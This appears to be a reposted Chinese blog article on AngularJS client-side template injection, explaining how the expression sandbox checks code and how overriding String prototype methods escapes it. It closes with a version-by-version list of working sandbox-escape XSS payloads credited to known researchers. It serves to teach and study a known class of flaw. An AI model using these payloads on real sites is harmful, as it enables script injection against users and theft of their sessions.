AngularJs 用戶(hù)輸入動(dòng)態(tài)模板X(qián)SS攻擊

前情提要

angularJs通過(guò)“{{}}”來(lái)作為輸出的標(biāo)志,而對(duì)于雙括號(hào)里面的內(nèi)容angularJs會(huì)計(jì)計(jì)算并輸出結(jié)果,我們可以在里面輸入JS代碼,并且一些語(yǔ)句還能得到執(zhí)行,這使得我們的XSS有了可能,雖然不能直接寫(xiě)函數(shù)表達(dá)式,但這并難不住我們的白帽。

沙箱檢驗(yàn)

angularJs會(huì)對(duì)表達(dá)式進(jìn)行重寫(xiě),并過(guò)濾計(jì)算輸出,比如我們輸入

{{1 + 1}}

在JS中會(huì)被轉(zhuǎn)換成

"use strict";
var fn = function(s, l, a, i) {
   return plus(1, 1);
};
return fn;

return fn;這里的返回會(huì)被angualrJs執(zhí)行,angularJs改寫(xiě)這個(gè)方法后轉(zhuǎn)換是這樣的

"use strict";
var fn = function(s, l, a, i) {
   var v0, v1, v2, v3, v4 = l && ('constructor' in l),
       v5;
   if (!(v4)) {
       if (s) {
           v3 = s.constructor;
       }
   } else {
       v3 = l.constructor;
   }
   ensureSafeObject(v3, text);
   if (v3 != null) {
       v2 = ensureSafeObject(v3.constructor, text);
   } else {
       v2 = undefined;
   }
   if (v2 != null) {
       ensureSafeFunction(v2, text);
       v5 = 'alert\u00281\u0029';
       ensureSafeObject(v3, text);
       v1 = ensureSafeObject(v3.constructor(ensureSafeObject('alert\u00281\u0029', text)), text);
   } else {
       v1 = undefined;
   }
   if (v1 != null) {
       ensureSafeFunction(v1, text);
       v0 = ensureSafeObject(v1(), text);
   } else {
       v0 = undefined;
   }
   return v0;
};
return fn;

angularJs會(huì)檢查每一個(gè)輸入的參數(shù),ensureSafeObject方法會(huì)檢驗(yàn)出函數(shù)的構(gòu)造方法,窗口對(duì)象,對(duì)象,或者對(duì)象的構(gòu)造方法,任意的其中一項(xiàng)被檢查出來(lái),表達(dá)式都不會(huì)執(zhí)行.angularJs還有ensureSafeMemeberName和ensureSafeFunction來(lái)過(guò)濾掉方法原型鏈方法和檢查這個(gè)指向。

如何逃逸

怎么樣能逃過(guò)模板的過(guò)濾呢,可以讓我們輸入的模板被角執(zhí)行,因?yàn)閍ngularJs不支持函數(shù)輸入,我們不可以直接覆蓋本地的JS函數(shù)。但在字符串對(duì)象中找到了漏洞,fromCharCode,則charCode, charAt,由于沒(méi)有重寫(xiě)這些方法,通過(guò)改變本地的js函數(shù),我可以在angularJs調(diào)用這些方法的時(shí)候?yàn)樽约洪_(kāi)一個(gè)后門(mén),將我改寫(xiě)的來(lái)覆蓋原來(lái)的函數(shù)。

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

formCharCode方法執(zhí)行的時(shí)候內(nèi)部的this指向的是String對(duì)象,通過(guò)上面的可指執(zhí)行語(yǔ)句,我們可以對(duì)fromCharCode 函數(shù)進(jìn)行覆蓋,當(dāng)在本頁(yè)面內(nèi)執(zhí)行時(shí),比如:

onload=function(){
document.write(String.fromCharCode(97));//會(huì)彈出 /Backdoored/ 
}

還可以這樣

'a'.constructor.prototype.charCodeAt=[].concat

當(dāng)angularJs調(diào)用charCodeAt函數(shù)時(shí),我的代碼就被執(zhí)行到angular源碼去了,比如說(shuō)在這段里面有encodeEntities 方法用來(lái)對(duì)屬性和名稱(chēng)做一個(gè)過(guò)濾然后輸出,

if (validAttrs[lkey] === true && (uriAttrs[lkey] !== true || uriValidator(value, isImage))) {
out(' ');
out(key);
out('="');
out(encodeEntities(value));//找的就是encodeEntities           
out('"');
}

具體的encodeEntities代碼如下:

function encodeEntities(value) {
return value.
  replace(/&/g, '&').
  replace(SURROGATE_PAIR_REGEXP, function(value) {
    var hi = value.charCodeAt(0);
    var low = value.charCodeAt(1);
    return '&#' + (((hi - 0xD800) * 0x400) + (low - 0xDC00) + 0x10000) + ';';
  }).
  replace(NON_ALPHANUMERIC_REGEXP, function(value) {
    return '&#' + value.charCodeAt(0) + ';';//這里發(fā)生了不好事情,我改寫(xiě)了這個(gè)方法,可以植入一些惡意代碼,并且得到返回輸出       }).
replace(/</g, '<').
replace(/>/g, '>');
}

具體執(zhí)行

//這是輸入代碼   
{{
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=""')+''
}} 

//這是被覆蓋影響的代碼     
"use strict";
var fn = function(s, l, a, i) {
  var v5, v6 = l && ('x\u003d\u0022\u0022' in l);//被影響的
   if (!(v6)) {
      if (s) {
          v5 = s.x = "";//被影響的
       }
  } else {
      v5 = l.x = "";//被影響的
   }
  return v5;
};
fn.assign = function(s, v, l) {
  var v0, v1, v2, v3, v4 = l && ('x\u003d\u0022\u0022' in l);//被影響的
   v3 = v4 ? l : s;
  if (!(v4)) {
      if (s) {
          v2 = s.x = "";//被影響的
        }
  } else {
      v2 = l.x = "";//被影響的
   }
  if (v3 != null) {
      v1 = v;
      ensureSafeObject(v3.x = "", text);//被影響的
       v0 = v3.x = "" = v1;//被影響的
   }
  return v0;
};
return fn;

{{
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)')+'' //注入了alert(1) 
}}

"use strict";
var fn = function(s, l, a, i) {
  var v5, v6 = l && ('x\u003dalert\u00281\u0029' in l);
  if (!(v6)) {
      if (s) {
          v5 = s.x = alert(1);
      }
  } else {
      v5 = l.x = alert(1);
  }
  return v5;
};
fn.assign = function(s, v, l) {
  var v0, v1, v2, v3, v4 = l && ('x\u003dalert\u00281\u0029' in l);
  v3 = v4 ? l : s;
  if (!(v4)) {
      if (s) {
          v2 = s.x = alert(1);
      }
  } else {
      v2 = l.x = alert(1);
  }
  if (v3 != null) {
      v1 = v;
      ensureSafeObject(v3.x = alert(1), text);
      v0 = v3.x = alert(1) = v1;
  }
  return v0;
};
return fn;

下面附上一些代碼,可以直接結(jié)合angularJs驗(yàn)證
不同版本的實(shí)現(xiàn)代碼以及發(fā)現(xiàn)者:

1.0.1 - 1.1.5 Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1 Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5 Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18 Jan Horn (Google)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23 Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0 Gábor Molnár (Google)

{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}

1.3.1 - 1.3.2 Gareth Heyes (PortSwigger)

{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf; 
$eval('x=alert(1)//'); 
}}

1.3.3 - 1.3.18 Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 

'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}

1.3.19 Gareth Heyes (PortSwigger)

{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 
$eval('x=alert(1)//'); 
}}

1.3.20 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9 Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8 Ian Hickey

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

1.5.9 - 1.5.11 Jan Horn (Google)

{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}

= 1.6.0 Mario Heiderich(Cure53)

{{constructor.constructor('alert(1)')()}}

轉(zhuǎn)自:https://pockr.org/activity/detail?activity_no=act_017d460d4e5988dad2

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容